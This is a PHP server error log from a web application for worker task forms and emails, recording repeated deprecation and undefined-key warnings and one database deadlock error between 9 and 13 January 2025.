Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:18:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 15:11:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 15:12:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:14:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:16:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 23:01:19 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 23:28:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:12:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:33:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:41:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:08:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:24:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:25:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:29:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 02:23:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:10:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:30:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:38:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:39:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 03:41:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 04:21:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:25:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:42:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 04:47:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:57:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 05:21:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:24:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:25:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:29:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:29:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:30:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:30:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:31:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:39:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:40:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:40:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:43:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:43:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:45:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:49:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:49:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:50:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:50:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:52:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:52:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:58:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 07:05:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 07:08:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 07:22:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Jan-2025 12:29:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 04:14:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 06:55:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 12:21:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 12:22:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:22:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:26:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 20:12:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 20:25:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 21:12:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 21:42:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:10:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:12:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:12:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:13:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:27:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:28:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:28:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:28:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:30:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:30:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:25:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 23:28:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:28:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:30:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:30:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:17:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:17:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:21:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:30:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:35:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:36:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:37:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:37:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:38:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:55:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:56:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:57:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:58:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 01:45:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [13-Jan-2025 02:28:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 02:29:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:08:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:08:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:26:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:26:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:30:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:39:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:47:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:48:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:53:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:54:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:54:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:55:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:55:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:56:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:37:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:45:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:45:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:46:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:58:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:59:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 05:03:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:30:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:36:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:38:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 06:21:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 06:25:21 UTC] PHP Warning: Undefined property: stdClass::$status in 